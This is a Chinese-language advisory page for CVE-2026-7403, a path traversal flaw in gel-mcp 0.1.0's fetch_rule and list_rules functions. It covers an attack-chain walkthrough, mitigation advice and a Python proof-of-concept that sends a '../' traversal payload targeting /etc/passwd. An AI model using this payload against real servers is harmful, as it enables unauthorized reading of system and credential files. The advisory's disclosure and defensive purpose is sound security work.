CVE-2026-7403 CVSS 5.3 中危

CVE-2026-7403 gel-mcp路径遍历漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7403

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

geldata gel-mcp

漏洞概述

geldata gel-mcp 0.1.0版本中存在严重的安全漏洞。该漏洞源于src/gel_mcp/server.py文件中的list_rules和fetch_rule函数未正确处理用户输入。攻击者可以通过操纵rule_name参数实施路径遍历攻击，从远程读取服务器上的敏感文件。目前利用代码已公开且厂商尚未修复，风险较高。

技术细节

该漏洞的核心在于应用程序对用户输入缺乏有效的校验机制。在gel-mcp的server.py文件中，list_rules和fetch_rule函数接收rule_name参数，并将其直接用于文件系统操作，未对路径进行规范化处理或限制访问范围。攻击者可以通过发送包含目录遍历序列（如../）的恶意数据包，绕过应用程序的目录限制。由于CVSS向量显示攻击复杂度低且无需认证，远程攻击者可轻易利用此漏洞访问Web根目录之外的文件，导致配置文件、源代码或其他敏感数据泄露。

攻击链分析

STEP 1

侦察

攻击者识别出目标服务器正在使用geldata gel-mcp 0.1.0版本。

STEP 2

武器化

攻击者构造包含路径遍历字符（如'..'）的恶意rule_name参数，旨在访问/etc/passwd等敏感文件。

STEP 3

交付

攻击者向目标服务器的list_rules或fetch_rule接口发送带有恶意参数的HTTP请求。

STEP 4

利用

服务器端代码直接处理rule_name参数，导致程序读取了非预期的文件路径。

STEP 5

影响

攻击者成功获取服务器上的敏感文件内容，造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    # Vulnerable parameter
    payload = {
        "rule_name": "../../../../../../etc/passwd" 
    }
    
    try:
        # Sending malicious request to the vulnerable endpoint
        # Adjust the endpoint path based on actual implementation
        response = requests.post(f"{target_url}/fetch_rule", data=payload)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response content:")
            print(response.text)
            # Check for common indicators of successful file read
            if "root:" in response.text or "[extensions]" in response.text:
                print("[!] Potential Path Traversal confirmed.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target address
    target = "http://127.0.0.1:8000"
    exploit(target)

影响范围

geldata gel-mcp 0.1.0

防御指南

临时缓解措施

由于官方尚未发布补丁，建议暂时限制对gel-mcp服务的外部网络访问，仅允许受信任的内部IP访问。同时，开发者应立即修改src/gel_mcp/server.py文件中的逻辑，在处理文件路径前添加严格的白名单验证或路径规范化检查，确保无法通过参数跳出指定目录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7403
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7403
3 Details https://www.cvedetails.com/cve/CVE-2026-7403/
4 VulDB https://vuldb.com/cve/CVE-2026-7403
5 Link https://github.com/geldata/gel-mcp/
6 Link https://github.com/geldata/gel-mcp/issues/11
7 Link https://vuldb.com/submit/803530
8 Link https://vuldb.com/vuln/360139
9 Link https://vuldb.com/vuln/360139/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表